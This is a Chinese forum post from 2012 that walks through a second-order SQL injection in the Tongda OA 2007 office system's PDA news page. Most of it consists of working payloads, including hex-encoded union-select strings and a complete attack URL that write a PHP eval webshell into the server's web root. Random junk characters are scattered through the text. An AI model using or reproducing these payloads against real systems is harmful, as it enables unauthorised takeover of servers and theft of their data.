目前测试通达OA2007版本
) D0 w1 C+ G; e4 u' E& Z/ c5 f% e/ v6 w: l, B
+ L" ?8 t, u) v y' {& I
Office Anywhere 2007 网络智能办公系统
3 n7 G' R; k6 {! u3 b' U1 e
0 z! m; p) R. i7 ]) x# Z4 I6 Whttp://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..) f' }0 ?# E0 A$ P, l0 U
& m1 g1 e% _/ o1 Y2 Y 1 K4 h" Q* L' F5 P* o9 p5 W# r
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
3 a' B/ w/ W" i- n- L
4 s/ G `, q' A. k2 ?! R, i例如:SELECT * from USER where USER_ID='{$USERNAME}' ?: _1 V8 R0 L
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
2 X1 f0 C8 A3 @$ P* V) r( R# ]
7 l5 e- {4 w6 \1 b/ ?$ N这个时候我们是不是可以组合起来使用哪?' n7 L7 p4 U. o6 [6 ^
, C& }( n! O( _8 a4 t第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
% J$ W* d- U' `+ X. E1 Iunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
* [4 T/ t: s6 N5 m$ h 3 c' _6 m" E5 Z5 M9 p( s" a/ R
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
3 D ?# Q' `# Y4 p4 a ) Z7 g" I* ^* E4 X$ \, m
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
6 y6 g# t5 M! [0 B$ o* ` - `& Y( F# M# y5 L$ R8 g
那么我们用字符串格式带入进行hex编码
) v% m: c) b1 \ ! f& d9 r0 \( q; [1 u, S
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
/ n& B/ [" P0 e
) j* Q4 `; @; `, e( @测试ok,获取oa的webshell
/ W `, \ u c$ q! G
: O! ]% e2 d: O% R/ V) O9 v6 V" N / H! J) k! |& }& A$ N
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23' S& o6 C2 t8 k; x
直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对